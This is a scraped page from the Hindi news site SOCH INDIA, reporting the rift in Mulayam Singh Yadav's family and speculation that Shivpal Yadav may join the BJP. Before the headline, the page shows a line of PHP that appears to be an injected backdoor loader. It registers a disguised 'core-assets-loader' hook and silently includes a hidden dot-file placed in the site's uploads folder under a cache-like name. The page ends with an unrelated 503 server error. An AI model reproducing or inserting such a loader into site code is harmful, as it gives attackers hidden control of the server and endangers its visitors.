add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); मुलायम कुनबे में रार: दिल्ली में पिता से मिले अखिलेश यादव, भतीजे को अब तक का सबसे बड़ा झटका दे सकते हैं शिवपाल – SOCH INDIA
Menu

मुलायम कुनबे में रार: दिल्ली में पिता से मिले अखिलेश यादव, भतीजे को अब तक का सबसे बड़ा झटका दे सकते हैं शिवपाल

nobanner

विस्तार
शिवपाल यादव के भाजपा में जाने की अटकलों के बीच सपा मुखिया अखिलेश यादव ने दिल्ली में पार्टी संरक्षक मुलायम सिंह यादव से मुलाकात की है। यादव कुनबे में इन दिनों सब कुछ ठीक नहीं है। चुनाव परिणाम आने के बाद अखिलेश यादव द्वारा बुलाई गई विधायकों की बैठक में शिवपाल को न्योता नहीं भेजा गया था। इससे नाराज शिवपाल ने 28 मार्च को अपने बड़े भाई मुलायम सिंह यादव से मुलाकात की थी।

उधर, सियासी गलियारों में चर्चा है कि शिवपाल यादव अब भाजपा में शामिल हो सकते हैं। पीएम मोदी को ट्विटर पर फॉलो करना, सीएम योगी आदित्यनाथ से मुलाकात करना इसके संकेत भी माने जा रहे हैं। इसके अलावा उन्होंने मुख्यमंत्री योगी आदित्यनाथ और पूर्व उपमुख्यमंत्री डॉ. दिनेश शर्मा को भी फॉलो किया है।

शिवपाल सिंह यादव के इस कदम से एक बार फिर से राजनीति में चर्चाओं का दौर शुरू हो गया है। इससे पहले, चर्चा थी कि शिवपाल यादव ने दिल्ली में गृहमंत्री अमित शाह से मुकाकात की थी, उसके बाद शिवपाल यादव बुधवार को मुख्यमंत्री योगी आदित्यनाथ से मिले थे।
खुद को उपेक्षित महसूस कर रहे हैं शिवपाल
सपा के साथ गठबंधन करने के बाद शिवपाल को उम्मीद थी कि उनकी पार्टी के नेताओं को भी टिकट मिलेगा। उन्होंने करीब 25 नेताओं की सूची अखिलेश यादव को सौंपी। यह कहा कि जो भी जिताऊ हों, उन्हें टिकट दे दें। लेकिन सपा ने सिर्फ उन्हें ही टिकट दिया।

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.